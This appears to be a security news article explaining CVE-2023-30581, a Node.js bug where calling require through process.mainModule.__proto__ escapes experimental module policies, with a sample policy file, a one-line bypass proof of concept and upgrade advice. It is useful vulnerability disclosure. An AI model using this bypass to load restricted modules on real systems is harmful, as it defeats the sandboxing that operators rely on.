CVE CyberSecurity Database News

CVE-2023-30581 - Breaking Node.js Module Security with `process.mainModule.__proto__.require()` Bypass

Poster -

Node.js is known for being a secure runtime, but even the best have their weak spots. In 2023, a serious vulnerability was discovered that can allow attackers to load modules bypassing Node.js’s experimental security policies—using a tricky JavaScript feature: __proto__. This CVE (Common Vulnerabilities and Exposures), tracked as CVE-2023-30581, allows malicious code to sidestep module restrictions put in place with policy configuration files. Let’s explore how this works, including code snippets and detailed exploit information, so you know what’s at stake.

What Is the Policy Mechanism?

Before diving in, let’s quickly recap the policy idea in Node.js. This (still experimental) feature lets developers define rules in a policy.json file. These rules limit which files and modules an app can access—think of it as a firewall for your modules. When you run Node.js with the --experimental-policy=policy.json flag, it’s supposed to stop code from loading modules not listed in your policy.

The Heart of the Vulnerability

The issue is, in short, that an attacker can bypass the policy mechanism and load any module they want—by abusing JavaScript’s prototype inheritance. Instead of using the usual, restricted require method, code can call:

process.mainModule.__proto__.require('<module_name>')

This sidesteps the policy checks and loads modules outside of the definitions in your policy.json. All Node.js versions with the policy feature—v16, v18, and v20 at the time this CVE was announced—are vulnerable.

Suppose you have a policy.json that only allows loading the built-in 'fs' module

{
  "resources": {
    "./app.js": {
      "integrity": "sha256-...your-app-sha256..."
    }
  },
  "scopes": {
    "./": {
      "dependencies": ["fs"]
    }
  }
}

When launching Node.js with

node --experimental-policy=policy.json app.js

Any require('os') or other modules should be blocked.

In your app.js

// This is allowed:
const fs = require('fs');

// This should throw with policy active:
const os = require('os'); // Throws an error: access denied by policy

Expected output

Error [ERR_MANIFEST_DEPENDENCY_MISSING]: Access to module 'os' denied by policy

But here’s the bug in action

const os = process.mainModule.__proto__.require('os');
console.log(os.platform());

Despite the policy, this loads the OS module and prints your platform.

Explanation:
While require on the module instance follows the policy, the core require (hanging off the actual prototype chain) does *not*. By climbing up to the prototype via __proto__, the call sidesteps the security gate.

Do not run untrusted scripts if you count on policies to protect your environment.

The Node.js team fixed this bug in later releases after May 2023. Check the Node.js security releases page for more info.

Original References

- Node.js Security Release Details — June 2023
- Official CVE-2023-30581 NIST Entry
- Node.js Pull Request w/ Patch

Conclusion

CVE-2023-30581 is a prime reminder that experimental features—like Node.js’s policy mechanism—shouldn't be used in production to guard against critical security boundaries. JavaScript’s flexible structures, like __proto__, are powerful but can be exploited in unexpected ways. If you use policies: upgrade Node.js, use traditional OS-level sandboxes, and keep an eye out for these sorts of subtle bugs.

Timeline

Published on: 11/23/2023 00:15:07 UTC
Last modified on: 11/30/2023 01:52:32 UTC